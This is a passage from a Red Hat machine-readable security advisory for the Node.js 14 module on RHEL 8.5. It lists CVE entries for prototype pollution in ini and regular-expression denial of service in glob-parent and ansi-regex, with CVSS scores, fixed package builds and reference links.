"userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-28469", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-01T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945459" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-glob-parent. The enclosure regex used to check for glob enclosures containing backslashes is vulnerable to Regular Expression Denial of Service attacks. This flaw allows an attacker to cause a denial of service if they can supply a malicious string to the glob-parent function. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-glob-parent: Regular expression denial of service", "title": "Vulnerability summary" }, { "category": "other", "text": "While some components do package a vulnerable version of glob-parent, access to them requires OpenShift OAuth credentials and hence have been marked with a Low impact. This applies to the following products:\n - OpenShift Container Platform (OCP)\n - OpenShift ServiceMesh (OSSM)\n - Red Hat Advanced Cluster Management for Kubernetes (RHACM)\n - OpenShift distributed tracing", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28469" }, { "category": "external", "summary": "RHBZ#1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28469", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28469" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" } ], "release_date": "2021-01-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-02-01T21:18:22+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:0350" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-glob-parent: Regular expression denial of service" }, { "cve": "CVE-2021-3807", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-17T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2007557" } ], "notes": [ { "category": "description", "text": "A regular expression denial of service (ReDoS) vulnerability was found in nodejs-ansi-regex. This could possibly cause an application using ansi-regex to use an excessive amount of CPU time when matching crafted ANSI escape codes.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw requires crafted invalid ANSI escape codes in order to be exploited and only allows for denial of service of applications on the client side, hence the impact has been rated as Moderate.\n\nIn Red Hat Virtualization and Red Hat Quay some components use a vulnerable version of ansi-regex. However, all frontend code is executed on the client side. As the maximum impact of this vulnerability is denial of service in the client, the vulnerability is rated Moderate for those products.\n\nOpenShift Container Platform 4 (OCP) ships affected version of ansi-regex in the ose-metering-hadoop container, however the metering operator is deprecated since 4.6[1]. This issue is not currently planned to be addressed in future updates and hence hadoop container has been marked as \u0027will not fix\u0027.\n\nAdvanced Cluster Management for Kubernetes (RHACM) ships the affected version of ansi-regex in several containers, however the impact of this vulnerability is deemed low as it would result in an authenticated slowing down their own user interface. \n\n[1] https://docs.openshift.com/container-platform/4.6/metering/metering-about-metering.html", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debuginfo-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-debugsource-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-devel-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-docs-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-full-i18n-1:14.18.2-2.module+el8.5.0+13644+8d46dafd.x86_64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13504+a2e74d91.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.aarch64", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.ppc64le", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.s390x", "AppStream-8.5.0.Z.MAIN:nodejs:14:8050020211213115342:c5368500:npm-1:6.14.15-1.14.18.2.2.module+el8.5.0+13644+8d46dafd.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3807" }, { "category": "external", "summary": "RHBZ#2007557", "url": 